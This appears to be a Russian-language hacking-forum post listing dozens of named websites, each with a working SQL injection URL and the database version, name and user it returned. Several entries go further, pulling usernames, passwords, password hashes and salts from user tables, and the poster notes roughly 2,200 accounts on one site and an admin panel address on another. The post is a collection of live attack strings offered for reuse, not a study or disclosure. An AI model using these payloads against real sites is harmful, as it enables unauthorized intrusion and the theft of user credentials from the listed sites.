SQL Инъекции

Microsoft SQL Server 2005 - 9.00.2050.00 (Intel X86) Feb 13 2007 23:02:48 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

 

Code:

http://www.lifelinebatteries.com/marineflyer.php?id=-3+union+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

Database Version: 5.0.45
Database name: batteries
User name: concorde_lynda@localhost

 

PR 6
BLIND

Code:

https://www.calico.org/page.php?id=1'+and+substring(version(),1,1)=5/*

 

http://krasotaspb.ru/services/news/article.php?ID=-13236+union+select+1,2,3,4,5,6,login,8,9,password+from+b_user+limit+105,1

Соц сеть какая то недоделаная. Пр 2 . 5я ветка.
Акков около 2200

 

http://www.anca.org/press_releases/press_releases.php?prid=1541+and+substring(version(),1,1)=3

 

http://avtodeti.ru
Портал о безопасности детей на дорогах

==========

 

PR 5

Code:

http://www.irs-net.de/kontakt/mitarbeiter.php?id=1+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,unhex(hex(concat_ws(0x3a,user,password))),17,18,19,20,21+from+mysql.user+limit+0,1/*

Database Version: 4.1.11-log
Database name: web
User name: [email protected]

 

PR 5

Code:

http://www.digitallyobsessed.com/displaypr.php?ID=-608+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),27,28,29,30,31,32,33,34,35,36+from+users--

Database Version: 5.0.81-community
Database name: bobftp_obsessed
User name: bobftp_king@localhost

 

http://www.belsoft.ru/index.php?cont=prices&page=a&dob=2&id=21085+limit+0+UNION+SELECT+1,2,3,4,5,6,7,CONCAT(Version(),Database(),User()),9,10,11--

Database Version: 5.0.67-log
Database name: u158438
User name: [email protected]

http://www.belsoft.ru/index.php?cont=prices&page=a&dob=2&id=21085+limit+0+UNION+SELECT+CONCAT((SELECT+CONCAT(converge_id,converge_pass_hash,converge_pass_salt)+FROM+u158438.ibf_members_converge+LIMIT+2,1)),2,3,4,5,6,7,8,9,10,11--

админка
http://www.belsoft.ru/forum/admin.php

 

http://www.gtbike.ru/articles.php?menu_id=38&razd_id=0&pg=1&id=-60+union+select+1,2,3,version(),5,6,7,8,9 PR 4

 

http://www.wavplanet.com/wavs.php?cat=5+union+select+1,concat(version(),database(),user()),3,4,5,6,7--


4.0.17-standard-log wavplanet [email protected]

 

[PR 6]

Code:

http://www.dacc.[COLOR=Lime]edu[/COLOR]/news/index.php?id=-503+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9

4.1.21-standard:newsublic@localhost
==============================
[PR 4]

Code:

http://www.laererportalen.dk/kalender.php?id=-547+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10

5.1.35:laererportal:laererportal_u@localhost
==============================
[PR 4]

Code:

http://www.szgl.at/kalender.php?id=-28+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6

4.0.23-Max-log:d00942bb:d00942bb@localhost
==============================
[PR 3]

Code:

http://www.futter-fuers-volk.de/kalender.php?id=-3+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22

5.0.51a-3ubuntu5.1:usr_web68_2:web68@localhost
==============================
[PR 3]

Code:

http://www.b-b-z.nl/jubileum/kalender.php?id=-7+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7

5.0.51a-3ubuntu5.4:b_b_z:b-b-z@localhost
==============================
[PR 2]

Code:

http://www.alexandra-ihrig.de/kalender.php?id=-12+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4

4.0.27-max-log:db196773590:[email protected]
==============================
[PR 0]

Code:

http://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())

5.0.81-1-log:neo24:[email protected]

Code:

http://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,username,user_password)+from+phoenix_phpbb_users

Code:

http://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,username,password)+from+tbl_users

 

http://www.radioworld.ca/information.php?info_id=-45+union+select+1,2,3+from+admin+--
4я версия

 

db_info:
http://snt-nmu.kiev.ua/?l=ukr&p=scientific_groups&group=-10'+union+select+1,2,3,4,concat_ws(0x0b,version(),user(),database()),6,7--+

tables:
http://snt-nmu.kiev.ua/?l=ukr&p=scientific_groups&group=-10'+union+select+1,2,3,4,group_concat(0x0b,column_name),6,7+from+information_schema.columns+where+table_name=0x7373735f70616e656c--+

ЗЫ: сайт на одном сервере с "инъектором" (inj3ct0r.com)

 

blind

http://www.hopewell-precision.com/product.php?prod_id=5+AND+ascii(lower(substring(database(),1,1)))>1

stan12187@localhost
stan121871
5.1.22-log

 

blind PR4

http://www.pollanetsquad.it/attore.asp?cod_att=2150+and+ascii(substring((concat_ws(char(58),user(),database(),version())),1,1))>1

Sql135947@%:Sql135947_1:5.0.68-log

 

http://www.baltimorebrass.net/index.php?cat=5+UNION+SELECT+1,2,3,4,CONCAT(Version(),Database(),User()),6,7--

67-communitybaltim4_websitebaltim4_wsclient@localhost

 

Code:

http://www.n-rabota.ru/resume/post.php?id=1+union+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--

Database Version: 5.0.81
Database name: n-rabota
User name: n-rabota@localhost

 

вывод в тег img